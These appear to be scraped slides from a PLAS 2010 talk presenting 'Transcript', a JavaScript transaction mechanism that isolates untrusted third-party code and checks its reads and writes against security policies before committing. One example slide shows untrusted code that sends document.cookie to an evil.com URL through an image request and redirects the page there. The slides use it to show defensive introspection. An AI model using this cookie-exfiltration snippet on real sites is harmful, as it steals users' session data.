the case for javascript transactions mohan dhawan, chung-chieh shan, vinod ganapathy department of...
TRANSCRIPT
![Page 1: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/1.jpg)
The Case for JavaScript Transactions
Mohan Dhawan, Chung-chieh Shan, Vinod GanapathyDepartment of Computer Science
Rutgers University
PLAS 2010
![Page 2: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/2.jpg)
Problem Web applications include third party content
Examples: widgets, advertisements, libraries May contain untrusted, malicious JavaScript
April 18, 2023 2PLAS 2010
![Page 3: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/3.jpg)
Example from nytimes.com Rouge third party advertisement
Displayed image of fake virus scan
Client security and privacy at risk
April 18, 2023 3PLAS 2010
![Page 4: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/4.jpg)
Goal Protect Web application data by isolating
untrusted JavaScript code Must handle arbitrary 3rd party code written in
JavaScript Including constructs such as eval, this, with.
Must enforce powerful security policies Allow pop-ups from white-listed websites only.
April 18, 2023 4PLAS 2010
![Page 5: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/5.jpg)
Outline Problem Transcript
Example Implementation Related Work Conclusion
April 18, 2023 5PLAS 2010
![Page 6: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/6.jpg)
Solution: Transcript
Extend JavaScript to support Transactions Execute untrusted content speculatively
Commit changes after policy enforcement
Transaction
Web Application
April 18, 2023 6PLAS 2010
![Page 7: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/7.jpg)
Transcript features Speculative execution of unmodified third
party JavaScript code
Suspend transactions on DOM and AJAX operations
Transactional execution of event handlers
April 18, 2023 7PLAS 2010
![Page 8: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/8.jpg)
Schematic use of Transcript
// Web application code
var tx = transaction{
...
// unmodified 3rd party code
...
};
// Introspection block goes below
/* policy enforcement code */
// validate actions of the transaction
tx.commit();
//Rest of the Web application code
Transaction
WebApplication
April 18, 2023 8PLAS 2010
![Page 9: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/9.jpg)
Outline
Problem Transcript
Example Implementation Related Work Conclusion
April 18, 2023 9PLAS 2010
![Page 10: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/10.jpg)
Example: Untrusted code// Web application code
var tx = transaction{
var image =
document.createElement(‘img’);
var url =
"http://evil.com/grabcookie.php";
var params = document.cookie;
image.src = url + "?cookie=" + params;
document.body.appendChild(image);
...
window.location = "http://evil.com";
};
Transaction
WebApplication
April 18, 2023 10PLAS 2010
![Page 11: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/11.jpg)
April 18, 2023 PLAS 2010 11
tx = transaction {...
body.appendChild(image);...
};
do {
...
tx = tx.resume();
...
} while(tx.isSuspended());
tx.commit();
Web application code…
…Rest of the Web application
read andwrite setscall stack
3rd party
Transaction object tx
web app
call stack3rd-party
……
resume
… …
call stack3rd party
1
2
3
tx’s writeset + Heaporig Heapnew=
4
12
3 4
5
read andwrite setscall stack
3rd party
Transaction object tx
web app
web app* web app*
Transcript runtime system
Introspection block
Transcript Runtime
On a transaction suspend, the Transcript runtime saves all the i) read write sets , andii) stack frames till the nearest transaction delimiter to create a Transaction objectTranscript runtime loads the savedread write sets and stack frames when the transaction resumes.
Transcript runtime applies the write set changes to the JavaScript heap when the transaction commits.
![Page 12: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/12.jpg)
Transaction suspend and resume
TransactionWeb
Application
April 18, 2023 12PLAS 2010
var tx = transaction{
...
document.body.appendChild(image);
};
do{
var rs = tx.getReadSet(), arg = tx.getArgs();
switch(tx.getCause()) {
case "appendChild":
if (arg[0].nodeName.match("IMG") &&
!rs.checkMembership(document,"cookie"))
obj.appendChild(arg[0]);
break; }; /* end switch */
tx = tx.resume();
}while(tx.isSuspended());
if (arg[0].nodeName.match("IMG") &&
!rs.checkMembership(document,"cookie"))
obj.appendChild(arg[0]);
Policy
![Page 13: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/13.jpg)
Read and Write Setsvar tx = transaction{
...
window.location = "http://evil.com";
};
/* Introspection Code */
var ws = tx.getWriteSet();
if(ws.checkMembership(window,"location")){
var loc = ws.getValue(window, "location");
if(!isWhiteListed(loc))
to_commit = false;
}
// Rest of the web application code
TransactionWeb
Application
var ws = tx.getWriteSet();
if(ws.checkMembership(window,"location")){
var loc = ws.getValue(window, "location");
if(!isWhiteListed(loc))
to_commit = false;
}
Policy
April 18, 2023 13PLAS 2010
![Page 14: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/14.jpg)
Outline Problem Transcript
Example Implementation Related Work Conclusion
April 18, 2023 14PLAS 2010
![Page 15: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/15.jpg)
Implementation Prototype implementation in Firefox 3.7a4 Added new JavaScript features
transaction keyword and Transaction object Modified interpreter op-codes to
Log all object accesses Suspend on DOM / AJAX calls
For details on semantics of the transactions, kindly refer the paper.
April 18, 2023 15PLAS 2010
![Page 16: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/16.jpg)
Outline Problem Transcript
Example Implementation Related Work Conclusion
April 18, 2023 16PLAS 2010
![Page 17: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/17.jpg)
Related Work Staged information flow in JavaScript: PLDI'09
hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code
Conscript: S&P'10 aspect-oriented framework to specify and enforce fine-
grained security policies for Web applications
AdJail: USENIX Security'10 isolation mechanism to protect Web application content
from malicious advertisements
Caja, FBJS, AdSafe, etc.
April 18, 2023 17PLAS 2010
![Page 18: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/18.jpg)
Conclusion
JavaScript transactions provide isolation Suspend operations that break isolation
Resume operation if web application allows
Enforcement of powerful security policies All data reads / writes are recorded Ability to inspect reads / writes before commit
No restriction or changes to third party code
April 18, 2023 18PLAS 2010
![Page 19: The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010](https://reader035.vdocument.in/reader035/viewer/2022062515/56649c765503460f9492a8ac/html5/thumbnails/19.jpg)
Questions ?
April 18, 2023 19PLAS 2010